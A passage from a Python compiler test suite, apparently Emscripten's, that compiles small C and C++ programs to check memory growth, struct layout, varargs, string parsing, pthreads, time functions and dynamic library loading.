if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
self.set_setting('MINIMAL_RUNTIME')
src = test_file('core/test_memorygrowth.c')
# Fail without memory growth
self.do_runf(src, 'OOM', assert_returncode=NON_ZERO)
# Win with it
self.set_setting('ALLOW_MEMORY_GROWTH')
self.do_runf(src, '*pre: hello,4.955*\n*hello,4.955*\n*hello,4.955*')
def test_memorygrowth(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
if self.maybe_closure():
# verify NO_DYNAMIC_EXECUTION is compatible with closure
self.set_setting('DYNAMIC_EXECUTION', 0)
# With typed arrays in particular, it is dangerous to use more memory than INITIAL_MEMORY,
# since we then need to enlarge the heap(s).
src = test_file('core/test_memorygrowth.c')
# Fail without memory growth
self.do_runf(src, 'OOM', assert_returncode=NON_ZERO)
fail = read_file('test_memorygrowth.js')
# Win with it
self.set_setting('ALLOW_MEMORY_GROWTH')
self.do_runf(src, '*pre: hello,4.955*\n*hello,4.955*\n*hello,4.955*')
win = read_file('test_memorygrowth.js')
if '-O2' in self.emcc_args and not self.is_wasm():
# Make sure ALLOW_MEMORY_GROWTH generates different code (should be less optimized)
possible_starts = ['// EMSCRIPTEN_START_FUNCS', 'var TOTAL_STACK']
code_start = None
for s in possible_starts:
if fail.find(s) >= 0:
code_start = s
break
assert code_start is not None, 'Generated code must contain one of ' + str(possible_starts)
fail = fail[fail.find(code_start):]
win = win[win.find(code_start):]
assert len(fail) < len(win), 'failing code - without memory growth on - is more optimized, and smaller' + str([len(fail), len(win)])
# Tracing of memory growths should work
# (SAFE_HEAP would instrument the tracing code itself, leading to recursion)
if not self.get_setting('SAFE_HEAP'):
self.emcc_args += ['--tracing']
self.do_runf(src, '*pre: hello,4.955*\n*hello,4.955*\n*hello,4.955*')
def test_memorygrowth_2(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
# With typed arrays in particular, it is dangerous to use more memory than INITIAL_MEMORY,
# since we then need to enlarge the heap(s).
src = test_file('core/test_memorygrowth_2.c')
# Fail without memory growth
self.do_runf(src, 'OOM', assert_returncode=NON_ZERO)
fail = read_file('test_memorygrowth_2.js')
# Win with it
self.set_setting('ALLOW_MEMORY_GROWTH')
self.do_runf(src, '*pre: hello,4.955*\n*hello,4.955*\n*hello,4.955*')
win = read_file('test_memorygrowth_2.js')
if '-O2' in self.emcc_args and not self.is_wasm():
# Make sure ALLOW_MEMORY_GROWTH generates different code (should be less optimized)
assert len(fail) < len(win), 'failing code - without memory growth on - is more optimized, and smaller' + str([len(fail), len(win)])
def test_memorygrowth_3(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
# checks handling of malloc failure properly
self.set_setting('ABORTING_MALLOC', 0)
self.set_setting('SAFE_HEAP')
self.do_core_test('test_memorygrowth_3.c')
@also_with_standalone_wasm(impure=True)
def test_memorygrowth_MAXIMUM_MEMORY(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
if not self.is_wasm():
self.skipTest('wasm memory specific test')
# check that memory growth does not exceed the wasm mem max limit
self.emcc_args += ['-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=64Mb', '-sMAXIMUM_MEMORY=100Mb']
self.do_core_test('test_memorygrowth_wasm_mem_max.c')
def test_memorygrowth_linear_step(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
if not self.is_wasm():
self.skipTest('wasm memory specific test')
# check that memory growth does not exceed the wasm mem max limit and is exactly or one step below the wasm mem max
self.emcc_args += ['-sALLOW_MEMORY_GROWTH', '-sTOTAL_STACK=1Mb', '-sINITIAL_MEMORY=64Mb', '-sMAXIMUM_MEMORY=130Mb', '-sMEMORY_GROWTH_LINEAR_STEP=1Mb']
self.do_core_test('test_memorygrowth_memory_growth_step.c')
def test_memorygrowth_geometric_step(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
if not self.is_wasm():
self.skipTest('wasm memory specific test')
self.emcc_args += ['-sALLOW_MEMORY_GROWTH', '-sMEMORY_GROWTH_GEOMETRIC_STEP=8.5', '-sMEMORY_GROWTH_GEOMETRIC_CAP=32MB']
self.do_core_test('test_memorygrowth_geometric_step.c')
def test_memorygrowth_3_force_fail_reallocBuffer(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.set_setting('TEST_MEMORY_GROWTH_FAILS')
self.do_core_test('test_memorygrowth_3.c')
@parameterized({
'nogrow': ([],),
'grow': (['-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=18MB'],)
})
@no_asan('requires more memory when growing')
@no_lsan('requires more memory when growing')
@no_memory64('does not fail under wasm64')
def test_aborting_new(self, args):
# test that C++ new properly errors if we fail to malloc when growth is
# enabled, with or without growth
self.emcc_args += args
self.do_core_test('test_aborting_new.cpp')
@no_wasm2js('no WebAssembly.Memory()')
@no_asan('ASan alters the memory size')
@no_lsan('LSan alters the memory size')
def test_module_wasm_memory(self):
self.emcc_args += ['--pre-js', test_file('core/test_module_wasm_memory.js')]
self.set_setting('IMPORTED_MEMORY')
self.do_runf(test_file('core/test_module_wasm_memory.c'), 'success')
def test_ssr(self): # struct self-ref
src = '''
#include <stdio.h>
// see related things in openjpeg
typedef struct opj_mqc_state {
unsigned int qeval;
int mps;
struct opj_mqc_state *nmps;
struct opj_mqc_state *nlps;
} opj_mqc_state_t;
static opj_mqc_state_t mqc_states[4] = {
{0x5600, 0, &mqc_states[2], &mqc_states[3]},
{0x5602, 1, &mqc_states[3], &mqc_states[2]},
};
int main() {
printf("*%ld*\\n", (long)(mqc_states+1)-(long)mqc_states);
for (int i = 0; i < 2; i++)
printf("%d:%d,%d,%ld,%ld\\n", i, mqc_states[i].qeval, mqc_states[i].mps,
(long)mqc_states[i].nmps-(long)mqc_states, (long)mqc_states[i].nlps-(long)mqc_states);
return 0;
}
'''
self.do_run(src, '''*16*\n0:22016,0,32,48\n1:22018,1,48,32\n''')
def test_tinyfuncstr(self):
self.do_core_test('test_tinyfuncstr.cpp')
def test_llvmswitch(self):
self.do_core_test('test_llvmswitch.c')
def test_cxx_version(self):
self.do_core_test('test_cxx_version.cpp')
@no_wasm2js('massive switches can break js engines')
def test_bigswitch(self):
self.do_runf(test_file('bigswitch.cpp'), '''34962: GL_ARRAY_BUFFER (0x8892)
26214: what?
35040: GL_STREAM_DRAW (0x88E0)
3060: what?
''', args=['34962', '26214', '35040', str(0xbf4)])
@no_wasm2js('massive switches can break js engines')
@is_slow_test
def test_biggerswitch(self):
if not self.is_optimizing():
self.skipTest('nodejs takes >6GB to compile this if the wasm is not optimized, which OOMs, see https://github.com/emscripten-core/emscripten/issues/7928#issuecomment-458308453')
num_cases = 20000
switch_case = self.run_process([PYTHON, test_file('gen_large_switchcase.py'), str(num_cases)], stdout=PIPE, stderr=PIPE).stdout
self.do_run(switch_case, '''58996: 589965899658996
59297: 592975929759297
59598: default
59899: 598995989959899
Success!''')
def test_indirectbr(self):
self.emcc_args = [x for x in self.emcc_args if x != '-g']
self.do_core_test('test_indirectbr.c')
@no_asan('local count too large for VMs')
@no_wasm2js('extremely deep nesting, hits stack limit on some VMs')
def test_indirectbr_many(self):
self.do_core_test('test_indirectbr_many.c')
def test_pack(self):
src = '''
#include <stdio.h>
#include <string.h>
#pragma pack(push,1)
typedef struct header
{
unsigned char id;
unsigned short colour;
unsigned char desc;
} header;
#pragma pack(pop)
typedef struct fatheader
{
unsigned char id;
unsigned short colour;
unsigned char desc;
} fatheader;
int main( int argc, const char *argv[] ) {
header h, *ph = 0;
fatheader fh, *pfh = 0;
printf("*%zu,%ld,%ld*\\n", sizeof(header), (long)((long)&h.desc - (long)&h.id), (long)(&ph[1])-(long)(&ph[0]));
printf("*%zu,%ld,%ld*\\n", sizeof(fatheader), (long)((long)&fh.desc - (long)&fh.id), (long)(&pfh[1])-(long)(&pfh[0]));
return 0;
}
'''
self.do_run(src, '*4,3,4*\n*6,4,6*')
def test_varargs(self):
self.do_core_test('test_varargs.c')
def test_varargs_multi(self):
self.do_core_test('test_varargs_multi.c')
@unittest.skip('clang cannot compile this code with that target yet')
def test_varargs_byval(self):
src = r'''
#include <stdio.h>
#include <stdarg.h>
typedef struct type_a {
union {
double f;
void *p;
int i;
short sym;
} value;
} type_a;
enum mrb_vtype {
MRB_TT_FALSE = 0, /* 0 */
MRB_TT_CLASS = 9 /* 9 */
};
typedef struct type_b {
enum mrb_vtype tt:8;
} type_b;
void print_type_a(int argc, ...);
void print_type_b(int argc, ...);
int main(int argc, char *argv[])
{
type_a a;
type_b b;
a.value.p = (void*) 0x12345678;
b.tt = MRB_TT_CLASS;
printf("The original address of a is: %p\n", a.value.p);
printf("The original type of b is: %d\n", b.tt);
print_type_a(1, a);
print_type_b(1, b);
return 0;
}
void print_type_a(int argc, ...) {
va_list ap;
type_a a;
va_start(ap, argc);
a = va_arg(ap, type_a);
va_end(ap);
printf("The current address of a is: %p\n", a.value.p);
}
void print_type_b(int argc, ...) {
va_list ap;
type_b b;
va_start(ap, argc);
b = va_arg(ap, type_b);
va_end(ap);
printf("The current type of b is: %d\n", b.tt);
}
'''
self.do_run(src, '''The original address of a is: 0x12345678
The original type of b is: 9
The current address of a is: 0x12345678
The current type of b is: 9
''')
def test_functionpointer_libfunc_varargs(self):
self.do_core_test('test_functionpointer_libfunc_varargs.c')
def test_structbyval(self):
self.set_setting('INLINING_LIMIT')
# part 1: make sure that normally, passing structs by value works
src = r'''
#include <stdio.h>
struct point
{
int x, y;
};
void dump(struct point p) {
p.x++; // should not modify
p.y++; // anything in the caller!
printf("dump: %d,%d\n", p.x, p.y);
}
void dumpmod(struct point *p) {
p->x++; // should not modify
p->y++; // anything in the caller!
printf("dump: %d,%d\n", p->x, p->y);
}
int main( int argc, const char *argv[] ) {
point p = { 54, 2 };
printf("pre: %d,%d\n", p.x, p.y);
dump(p);
void (*dp)(point p) = dump; // And, as a function pointer
dp(p);
printf("post: %d,%d\n", p.x, p.y);
dumpmod(&p);
dumpmod(&p);
printf("last: %d,%d\n", p.x, p.y);
return 0;
}
'''
self.do_run(src, 'pre: 54,2\ndump: 55,3\ndump: 55,3\npost: 54,2\ndump: 55,3\ndump: 56,4\nlast: 56,4')
def test_stdlibs(self):
# safe heap prints a warning that messes up our output.
self.set_setting('SAFE_HEAP', 0)
# needs atexit
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_stdlibs.c')
def test_stdbool(self):
create_file('test_stdbool.c', r'''
#include <stdio.h>
#include <stdbool.h>
int main() {
bool x = true;
bool y = false;
printf("*%d*\n", x != y);
return 0;
}
''')
self.do_runf('test_stdbool.c', '*1*')
def test_strtoll_hex(self):
# tests strtoll for hex strings (0x...)
self.do_core_test('test_strtoll_hex.c')
def test_strtoll_dec(self):
# tests strtoll for decimal strings (0x...)
self.do_core_test('test_strtoll_dec.c')
def test_strtoll_bin(self):
# tests strtoll for binary strings (0x...)
self.do_core_test('test_strtoll_bin.c')
def test_strtoll_oct(self):
# tests strtoll for decimal strings (0x...)
self.do_core_test('test_strtoll_oct.c')
def test_strtol_hex(self):
# tests strtoll for hex strings (0x...)
self.do_core_test('test_strtol_hex.c')
def test_strtol_dec(self):
# tests strtoll for decimal strings (0x...)
self.do_core_test('test_strtol_dec.c')
def test_strtol_bin(self):
# tests strtoll for binary strings (0x...)
self.do_core_test('test_strtol_bin.c')
def test_strtol_oct(self):
# tests strtoll for decimal strings (0x...)
self.do_core_test('test_strtol_oct.c')
@also_with_standalone_wasm()
def test_atexit(self):
# Confirms they are called in the proper reverse order
if not self.get_setting('STANDALONE_WASM'):
# STANDALONE_WASM mode always sets EXIT_RUNTIME if main exists
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_atexit.c')
@no_lsan('https://github.com/emscripten-core/emscripten/issues/15988')
def test_atexit_threads_stub(self):
# also tests thread exit (__cxa_thread_atexit)
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_atexit_threads.cpp')
@node_pthreads
def test_atexit_threads(self):
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_atexit_threads.cpp')
@no_asan('test relies on null pointer reads')
def test_pthread_specific(self):
self.do_run_in_out_file_test('pthread/specific.c')
def test_pthread_equal(self):
self.do_run_in_out_file_test('pthread/test_pthread_equal.cpp')
@node_pthreads
def test_pthread_proxying(self):
self.set_setting('EXIT_RUNTIME')
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('INITIAL_MEMORY=32mb')
args = [f'-I{path_from_root("system/lib/pthread")}']
self.do_run_in_out_file_test('pthread/test_pthread_proxying.c',
emcc_args=args, interleaved_output=False)
@node_pthreads
def test_pthread_dispatch_after_exit(self):
self.do_run_in_out_file_test('pthread/test_pthread_dispatch_after_exit.c', interleaved_output=False)
@node_pthreads
def test_pthread_atexit(self):
# Test to ensure threads are still running when atexit-registered functions are called
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.do_run_in_out_file_test('pthread/test_pthread_atexit.c')
@node_pthreads
def test_pthread_nested_work_queue(self):
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.do_run_in_out_file_test('pthread/test_pthread_nested_work_queue.c')
@node_pthreads
def test_pthread_thread_local_storage(self):
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.set_setting('INITIAL_MEMORY', '300mb')
self.do_run_in_out_file_test('pthread/test_pthread_thread_local_storage.cpp')
@node_pthreads
def test_pthread_cleanup(self):
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 4)
self.do_run_in_out_file_test('pthread/test_pthread_cleanup.cpp')
@node_pthreads
def test_pthread_setspecific_mainthread(self):
self.set_setting('EXIT_RUNTIME')
print('.. return')
self.do_runf(test_file('pthread/test_pthread_setspecific_mainthread.c'), 'done!', emcc_args=['-DRETURN'])
print('.. exit')
self.do_runf(test_file('pthread/test_pthread_setspecific_mainthread.c'), 'done!', emcc_args=['-DEXIT'])
print('.. pthread_exit')
self.do_run_in_out_file_test('pthread/test_pthread_setspecific_mainthread.c')
@node_pthreads
def test_pthread_attr_getstack(self):
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.do_run_in_out_file_test('pthread/test_pthread_attr_getstack.c')
@node_pthreads
@no_mac('https://github.com/emscripten-core/emscripten/issues/15014')
def test_pthread_abort(self):
self.set_setting('PROXY_TO_PTHREAD')
# Add the onAbort handler at runtime during preRun. This means that onAbort
# handler will only be present in the main thread (much like it would if it
# was passed in by pre-populating the module object on prior to loading).
self.add_pre_run("Module.onAbort = function() { console.log('onAbort called'); }")
self.do_run_in_out_file_test('pthread/test_pthread_abort.c', assert_returncode=NON_ZERO)
@node_pthreads
def test_pthread_abort_interrupt(self):
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 1)
expected = ['Aborted(). Build with -s ASSERTIONS=1 for more info', 'Aborted(native code called abort())']
self.do_runf(test_file('pthread/test_pthread_abort_interrupt.c'), expected, assert_returncode=NON_ZERO)
@no_asan('ASan does not support custom memory allocators')
@no_lsan('LSan does not support custom memory allocators')
@node_pthreads
def test_pthread_emmalloc(self):
self.emcc_args += ['-fno-builtin']
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.set_setting('ASSERTIONS', 2)
self.set_setting('MALLOC', 'emmalloc')
self.do_core_test('test_emmalloc.c')
def test_tcgetattr(self):
self.do_runf(test_file('termios/test_tcgetattr.c'), 'success')
def test_time(self):
self.do_core_test('test_time.cpp')
for tz in ['EST+05EDT', 'UTC+0']:
print('extra tz test:', tz)
with env_modify({'TZ': tz}):
# Run the test with different time zone settings if
# possible. It seems that the TZ environment variable does not
# work all the time (at least it's not well respected by
# Node.js on Windows), but it does no harm either.
self.do_core_test('test_time.cpp')
def test_timeb(self):
# Confirms they are called in reverse order
self.do_core_test('test_timeb.c')
def test_time_c(self):
self.do_core_test('test_time_c.c')
def test_gmtime(self):
self.do_core_test('test_gmtime.c')
def test_strptime_tm(self):
self.do_core_test('test_strptime_tm.c')
def test_strptime_days(self):
self.do_core_test('test_strptime_days.c')
def test_strptime_reentrant(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_strptime_reentrant.c')
def test_strftime(self):
self.do_core_test('test_strftime.cpp')
def test_trickystring(self):
self.do_core_test('test_trickystring.c')
def test_statics(self):
self.do_core_test('test_statics.cpp')
def test_copyop(self):
# clang generated code is vulnerable to this, as it uses
# memcpy for assignments, with hardcoded numbers of bytes
# (llvm-gcc copies items one by one).
self.do_core_test('test_copyop.cpp')
def test_memcpy_memcmp(self):
self.banned_js_engines = [config.V8_ENGINE] # Currently broken under V8_ENGINE but not node
def check(output):
output = output.replace('\n \n', '\n') # remove extra node output
return hashlib.sha1(output.encode('utf-8')).hexdigest()
self.do_core_test('test_memcpy_memcmp.c', output_nicerizer=check)
def test_memcpy2(self):
self.do_core_test('test_memcpy2.c')
def test_memcpy3(self):
self.do_core_test('test_memcpy3.c')
@also_with_standalone_wasm()
def test_memcpy_alignment(self):
self.do_runf(test_file('test_memcpy_alignment.cpp'), 'OK.')
def test_memset_alignment(self):
self.do_runf(test_file('test_memset_alignment.cpp'), 'OK.')
def test_memset(self):
self.do_core_test('test_memset.c')
def test_getopt(self):
self.do_core_test('test_getopt.c', args=['-t', '12', '-n', 'foobar'])
def test_getopt_long(self):
self.do_core_test('test_getopt_long.c', args=['--file', 'foobar', '-b'])
def test_memmove(self):
self.do_core_test('test_memmove.c')
def test_memmove2(self):
self.do_core_test('test_memmove2.c')
def test_memmove3(self):
self.do_core_test('test_memmove3.c')
def test_flexarray_struct(self):
self.do_core_test('test_flexarray_struct.c')
def test_bsearch(self):
self.do_core_test('test_bsearch.c')
def test_stack_overflow(self):
self.set_setting('ASSERTIONS', 2)
self.do_runf(test_file('core/stack_overflow.cpp'), 'stack overflow', assert_returncode=NON_ZERO)
def test_stackAlloc(self):
self.do_core_test('stackAlloc.cpp')
def test_nestedstructs(self):
src = '''
#include <stdio.h>
#include "emscripten.h"
struct base {
int x;
float y;
union {
int a;
float b;
};
char c;
};
struct hashtableentry {
int key;
base data;
};
struct hashset {
typedef hashtableentry entry;
struct chain { entry elem; chain *next; };
// struct chainchunk { chain chains[100]; chainchunk *next; };
};
struct hashtable : hashset {
hashtable() {
base *b = NULL;
entry *e = NULL;
chain *c = NULL;
printf("*%zu,%ld,%ld,%ld,%ld,%ld|%zu,%ld,%ld,%ld,%ld,%ld,%ld,%ld|%zu,%ld,%ld,%ld,%ld,%ld,%ld,%ld,%ld,%ld*\\n",
sizeof(base),
long(&(b->x)), long(&(b->y)), long(&(b->a)), long(&(b->b)), long(&(b->c)),
sizeof(hashtableentry),
long(&(e->key)), long(&(e->data)), long(&(e->data.x)), long(&(e->data.y)), long(&(e->data.a)), long(&(e->data.b)), long(&(e->data.c)),
sizeof(hashset::chain),
long(&(c->elem)), long(&(c->next)), long(&(c->elem.key)), long(&(c->elem.data)), long(&(c->elem.data.x)), long(&(c->elem.data.y)), long(&(c->elem.data.a)), long(&(c->elem.data.b)), long(&(c->elem.data.c))
);
}
};
struct B { char buffer[62]; int last; char laster; char laster2; };
struct Bits {
unsigned short A : 1;
unsigned short B : 1;
unsigned short C : 1;
unsigned short D : 1;
unsigned short x1 : 1;
unsigned short x2 : 1;
unsigned short x3 : 1;
unsigned short x4 : 1;
};
int main() {
hashtable t;
// Part 2 - the char[] should be compressed, BUT have a padding space at the end so the next
// one is aligned properly. Also handle char; char; etc. properly.
B *b = NULL;
printf("*%ld,%ld,%ld,%ld,%ld,%ld,%ld,%ld,%zu*\\n", long(b), long(&(b->buffer)), long(&(b->buffer[0])), long(&(b->buffer[1])), long(&(b->buffer[2])),
long(&(b->last)), long(&(b->laster)), long(&(b->laster2)), sizeof(B));
// Part 3 - bitfields, and small structures
Bits *b2 = NULL;
printf("*%zu*\\n", sizeof(Bits));
return 0;
}
'''
# Bloated memory; same layout as C/C++
self.do_run(src, '*16,0,4,8,8,12|20,0,4,4,8,12,12,16|24,0,20,0,4,4,8,12,12,16*\n*0,0,0,1,2,64,68,69,72*\n*2*')
def prep_dlfcn_main(self):
self.set_setting('NODERAWFS')
self.clear_setting('SIDE_MODULE')
# Link against the side modules but don't load them on startup.
self.set_setting('NO_AUTOLOAD_DYLIBS')
self.emcc_args.append('liblib.so')
# This means we can use MAIN_MODULE=2 without needing to explictly
# specify EXPORTED_FUNCTIONS.
self.set_setting('MAIN_MODULE', 2)
def build_dlfcn_lib(self, filename):
self.clear_setting('MAIN_MODULE')
self.set_setting('SIDE_MODULE')
outfile = self.build(filename, js_outfile=not self.is_wasm())
shutil.move(outfile, 'liblib.so')
@needs_dylink
def test_dlfcn_missing(self):
self.set_setting('MAIN_MODULE')
self.set_setting('ASSERTIONS')
src = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <assert.h>
int main() {
void* lib_handle = dlopen("libfoo.so", RTLD_NOW);
assert(!lib_handle);
printf("error: %s\n", dlerror());
return 0;
}
'''
self.do_run(src, "error: Could not load dynamic lib: libfoo.so\nError: ENOENT: no such file or directory, open 'libfoo.so'")
@needs_dylink
def test_dlfcn_basic(self):
create_file('liblib.cpp', '''
#include <cstdio>
class Foo {
public:
Foo() {
puts("Constructing lib object.");
}
};
Foo global;
''')
self.build_dlfcn_lib('liblib.cpp')
self.prep_dlfcn_main()
src = '''
#include <cstdio>
#include <dlfcn.h>
class Bar {
public:
Bar() {
puts("Constructing main object.");
}
};
Bar global;
int main() {
dlopen("liblib.so", RTLD_NOW);
return 0;
}
'''
self.do_run(src, 'Constructing main object.\nConstructing lib object.\n')
@needs_dylink
def test_dlfcn_i64(self):
create_file('liblib.c', '''
#include <inttypes.h>
int64_t foo(int x) {
return (long long)x / (long long)1234;
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
src = r'''
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
typedef int64_t (*int64func)(int);
int main() {
void *lib_handle = dlopen("liblib.so", RTLD_NOW);
if (!lib_handle) {
puts(dlerror());
abort();
}
printf("dll handle: %p\n", lib_handle);
int64func x = (int64func)dlsym(lib_handle, "foo");
printf("foo func handle: %p\n", x);
if (!x) {
printf("dlsym failed: %s\n", dlerror());
return 1;
}
printf("|%lld|\n", x(81234567));
return 0;
}
'''
self.do_run(src, '|65830|')
@needs_dylink
@disabled('EM_ASM in not yet supported in SIDE_MODULE')
def test_dlfcn_em_asm(self):
create_file('liblib.cpp', '''
#include <emscripten.h>
class Foo {
public:
Foo() {
EM_ASM( out("Constructing lib object.") );
}
};
Foo global;
''')
self.build_dlfcn_lib('liblib.cpp')
self.prep_dlfcn_main()
src = '''
#include <emscripten.h>
#include <dlfcn.h>
class Bar {
public:
Bar() {
EM_ASM( out("Constructing main object.") );
}
};
Bar global;
int main() {
dlopen("liblib.so", RTLD_NOW);
EM_ASM( out("All done.") );
return 0;
}
'''
self.do_run(src, 'Constructing main object.\nConstructing lib object.\nAll done.\n')
@needs_dylink
def test_dlfcn_qsort(self):
create_file('liblib.c', '''
int lib_cmp(const void* left, const void* right) {
const int* a = (const int*) left;
const int* b = (const int*) right;
if(*a > *b) return 1;
else if(*a == *b) return 0;
else return -1;
}
typedef int (*CMP_TYPE)(const void*, const void*);
CMP_TYPE get_cmp() {
return lib_cmp;
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
src = '''
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
typedef int (*CMP_TYPE)(const void*, const void*);
int main_cmp(const void* left, const void* right) {
const int* a = (const int*) left;
const int* b = (const int*) right;
if(*a < *b) return 1;
else if(*a == *b) return 0;
else return -1;
}
int main() {
void* lib_handle;
CMP_TYPE (*getter_ptr)();
CMP_TYPE lib_cmp_ptr;
int arr[5] = {4, 2, 5, 1, 3};
qsort((void*)arr, 5, sizeof(int), main_cmp);
printf("Sort with main comparison: ");
for (int i = 0; i < 5; i++) {
printf("%d ", arr[i]);
}
printf("\\n");
lib_handle = dlopen("liblib.so", RTLD_NOW);
if (lib_handle == NULL) {
printf("Could not load lib.\\n");
return 1;
}
getter_ptr = (CMP_TYPE (*)()) dlsym(lib_handle, "get_cmp");
if (getter_ptr == NULL) {
printf("Could not find func.\\n");
return 1;
}
lib_cmp_ptr = getter_ptr();
qsort((void*)arr, 5, sizeof(int), lib_cmp_ptr);
printf("Sort with lib comparison: ");
for (int i = 0; i < 5; i++) {
printf("%d ", arr[i]);
}
printf("\\n");
return 0;
}
'''
self.do_run(src, 'Sort with main comparison: 5 4 3 2 1 *Sort with lib comparison: 1 2 3 4 5 *',
output_nicerizer=lambda x: x.replace('\n', '*'))
@needs_dylink
def test_dlfcn_data_and_fptr(self):
# Failing under v8 since: https://chromium-review.googlesource.com/712595
if self.is_wasm():
self.banned_js_engines = [config.V8_ENGINE]
create_file('liblib.c', r'''
#include <stdio.h>
int theglobal = 42;
extern void parent_func(); // a function that is defined in the parent
int* lib_get_global_addr() {
return &theglobal;
}
void lib_fptr() {
printf("Second calling lib_fptr from main.\n");
parent_func();
// call it also through a pointer, to check indexizing
void (*p_f)();
p_f = parent_func;
p_f();
}
void (*func(int x, void(*fptr)()))() {
printf("In func: %d\n", x);
fptr();
return lib_fptr;
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
src = r'''
#include <stdio.h>
#include <dlfcn.h>
#include <emscripten.h>
typedef void (*FUNCTYPE(int, void(*)()))();
FUNCTYPE func;
void EMSCRIPTEN_KEEPALIVE parent_func() {
printf("parent_func called from child\n");
}
void main_fptr() {
printf("First calling main_fptr from lib.\n");
}
int main() {
void* lib_handle;
FUNCTYPE* func_fptr;
// Test basic lib loading.
lib_handle = dlopen("liblib.so", RTLD_NOW);
if (lib_handle == NULL) {
printf("Could not load lib.\n");
return 1;
}
// Test looked up function.
func_fptr = (FUNCTYPE*) dlsym(lib_handle, "func");
// Load twice to test cache.
func_fptr = (FUNCTYPE*) dlsym(lib_handle, "func");
if (func_fptr == NULL) {
printf("Could not find func.\n");
return 1;
}
// Test passing function pointers across module bounds.
void (*fptr)() = func_fptr(13, main_fptr);
fptr();
// Test global data.
int* globaladdr = (int*) dlsym(lib_handle, "theglobal");
if (globaladdr == NULL) {
printf("Could not find global.\n");
return 1;
}
printf("Var: %d\n", *globaladdr);
return 0;
}
'''
self.do_run(src, '''\
In func: 13
First calling main_fptr from lib.
Second calling lib_fptr from main.
parent_func called from child
parent_func called from child
Var: 42
''', force_c=True)
@needs_dylink
def test_dlfcn_varargs(self):
# this test is not actually valid - it fails natively. the child should fail
# to be loaded, not load and successfully see the parent print_ints func
create_file('liblib.c', r'''
void print_ints(int n, ...);
void func() {
print_ints(2, 13, 42);
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
src = r'''
#include <stdarg.h>
#include <stdio.h>
#include <dlfcn.h>
#include <assert.h>
void print_ints(int n, ...) {
va_list args;
va_start(args, n);
for (int i = 0; i < n; i++) {
printf("%d\n", va_arg(args, int));
}
va_end(args);
}
int main() {
void* lib_handle;
void (*fptr)();
print_ints(2, 100, 200);
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle);
fptr = (void (*)())dlsym(lib_handle, "func");
fptr();
return 0;
}
'''
self.do_run(src, '100\n200\n13\n42\n', force_c=True)
@needs_dylink
def test_dlfcn_alignment_and_zeroing(self):
self.set_setting('INITIAL_MEMORY', '16mb')
create_file('liblib.c', r'''
int prezero = 0;
__attribute__((aligned(1024))) int superAligned = 12345;
int postzero = 0;
''')
self.build_dlfcn_lib('liblib.c')
for i in range(10):
curr = '%d.so' % i
shutil.copyfile('liblib.so', curr)
self.prep_dlfcn_main()
self.set_setting('INITIAL_MEMORY', '128mb')
create_file('src.c', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dlfcn.h>
#include <assert.h>
#include <emscripten.h>
int main() {
printf("'prepare' memory with non-zero inited stuff\n");
int num = 120 * 1024 * 1024; // total is 128; we'll use 5*5 = 25 at least, so allocate pretty much all of it
void* mem = malloc(num);
assert(mem);
printf("setting this range to non-zero: %ld - %ld\n", (long)mem, ((long)mem) + num);
memset(mem, 1, num);
EM_ASM({
var value = HEAP8[64*1024*1024];
out('verify middle of memory is non-zero: ' + value);
assert(value === 1);
});
free(mem);
for (int i = 0; i < 10; i++) {
char curr[] = "?.so";
curr[0] = '0' + i;
printf("loading %s\n", curr);
void* lib_handle = dlopen(curr, RTLD_NOW);
if (!lib_handle) {
puts(dlerror());
assert(0);
}
printf("getting superAligned\n");
int* superAligned = (int*)dlsym(lib_handle, "superAligned");
assert(superAligned);
assert(((long)superAligned) % 1024 == 0); // alignment
printf("checking value of superAligned, at %p\n", superAligned);
assert(*superAligned == 12345); // value
printf("getting prezero\n");
int* prezero = (int*)dlsym(lib_handle, "prezero");
assert(prezero);
printf("checking value of prezero, at %p\n", prezero);
assert(*prezero == 0);
*prezero = 1;
assert(*prezero != 0);
printf("getting postzero\n");
int* postzero = (int*)dlsym(lib_handle, "postzero");
printf("checking value of postzero, at %p\n", postzero);
assert(postzero);
printf("checking value of postzero\n");
assert(*postzero == 0);
*postzero = 1;
assert(*postzero != 0);
}
printf("success.\n");
return 0;
}
''')
